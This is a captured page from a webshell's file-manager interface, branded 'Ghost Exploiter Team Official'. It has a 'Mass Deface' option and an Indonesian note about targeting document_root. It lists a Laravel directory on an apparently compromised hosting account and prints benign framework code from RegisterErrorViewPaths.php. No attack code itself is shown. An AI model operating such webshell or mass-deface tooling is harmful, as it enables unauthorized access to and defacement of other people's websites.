webshell
Ghost Exploiter Team Official
Mass Deface
Directory >>
/
home
/
whitjouh
/
public_html
/
core
/
vendor
/
laravel
/
framework
/
src
/
Illuminate
/
Foundation
/
Exceptions
/
Mass Deface Auto Detect Domain
/*Ubah Ke document_root untuk mass deface*/
File / Folder
Size
Action
.
-
+New File
Whoops
--
ren
views
--
ren
Handler.php
25.607KB
edt
ren
RegisterErrorViewPaths.php
0.413KB
edt
ren
ReportableHandler.php
1.53KB
edt
ren
<?php namespace Illuminate\Foundation\Exceptions; use Illuminate\Support\Facades\View; class RegisterErrorViewPaths { /** * Register the error view paths. * * @return void */ public function __invoke() { View::replaceNamespace('errors', collect(config('view.paths'))->map(function ($path) { return "{$path}/errors"; })->push(__DIR__.'/views')->all()); } }
<=Back
Liking